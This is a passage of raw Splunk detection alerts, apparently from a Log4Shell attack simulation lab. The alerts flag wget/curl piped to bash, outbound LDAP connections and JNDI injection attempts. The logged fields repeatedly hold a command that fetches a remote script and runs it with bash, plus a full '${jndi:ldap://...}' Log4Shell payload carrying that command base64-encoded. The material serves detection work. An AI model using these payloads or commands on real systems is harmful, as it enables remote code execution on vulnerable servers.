sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", 
annotations._all="Stage:Initial Access", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644852, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of the web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web data model and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. 
If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not by itself mean that the host was successfully exploited. Note also that the literal `${jndi:ldap://` pattern will not match payloads that use other JNDI schemes (e.g. rmi, dns) or obfuscated forms of the jndi keyword, so the absence of a hit is not proof of the absence of an attempt.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers, or applications that use an organization's LDAP servers. LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine whether you have any LDAP connections to IP addresses outside of private (RFC 1918) address space. Note that the dest_ip in this event, 0:0:0:0:0:ffff:a00:110, is the IPv4-mapped IPv6 form of 10.0.1.16 (the same host that serves the `${jndi:ldap://10.0.1.16:1389/...}` payload in the adjacent Log4Shell event) and src_ip 0:0:0:0:0:ffff:a00:114 is 10.0.1.20; both are RFC 1918 space, so the rule's private-address exclusion evidently does not normalise IPv4-mapped addresses and should be adjusted to do so before a hit is treated as true perimeter egress.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644852, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of the web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web data model and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not by itself mean that the host was successfully exploited. Note also that the literal `${jndi:ldap://` pattern will not match payloads that use other JNDI schemes (e.g. rmi, dns) or obfuscated forms of the jndi keyword, so the absence of a hit is not proof of the absence of an attempt.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
